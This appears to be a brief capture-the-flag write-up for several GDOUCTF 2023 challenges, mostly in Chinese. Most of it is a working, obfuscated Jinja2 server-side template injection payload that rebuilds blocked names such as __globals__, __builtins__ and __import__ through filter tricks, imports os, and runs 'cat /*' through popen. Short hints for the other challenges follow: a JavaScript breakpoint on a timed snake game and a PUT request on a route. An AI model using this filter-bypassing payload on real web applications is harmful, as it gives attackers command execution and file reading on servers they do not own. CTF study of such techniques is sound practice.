[GDOUCTF 2023]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
{%set a={}|select|string|list%}
{%set ax={}|select|string|list%}
{%set aa=dict(ssss=a)|join%}
{%set aaa=dict(ssssss=a)|join%}
{%set aaaa=dict(ss=a)|join%}
{%set aaaaa=dict(sssss=a)|join%}
{%set b=dict(pop=a)|join%}
{%set c=a|attr(b)(aa|length*aaa|length)%}
{%set cc=a|attr(b)(aaaa|length*aaaaa|length)%}
{%set d=(c,c,dict(get=a,item=a)|join,c,c)|join%}
{%set dd=(c,c,dict(in=a,it=a)|join,c,c)|join%}
{%set ddd=(c,c,dict(glob=a,als=a)|join,c,c)|join%}
{%set dddd=(c,c,dict(buil=a,tins=a)|join,c,c)|join%}
{%set e=(c,c,dict(impo=a,rt=a)|join,c,c)|join%}
{%set ee=(dict(o=a,s=a)|join)|join%}
{%set eee=(dict(po=a,pen=a)|join)|join%}
{%set eeee='cat /*'%}
{%set f=(dict(rea=a,d=a)|join)|join%}
{{x|attr(dd)|attr(ddd)|attr(d)(dddd)|attr(d)(e)(ee)|attr(eee)(eeee)|attr(f)()}}

[GDOUCTF 2023]hate eat snake

根据提示坚持60s,查看js源码发现分数根据系统时间来决定,所以先开始游戏按下空格,在82行计算时间那栏打上断点等60s即可

[GDOUCTF 2023]受不了一点

image-20230417122555928

[GDOUCTF 2023]EZ_WEB

把源码下下来,按着路由用PUT访问即可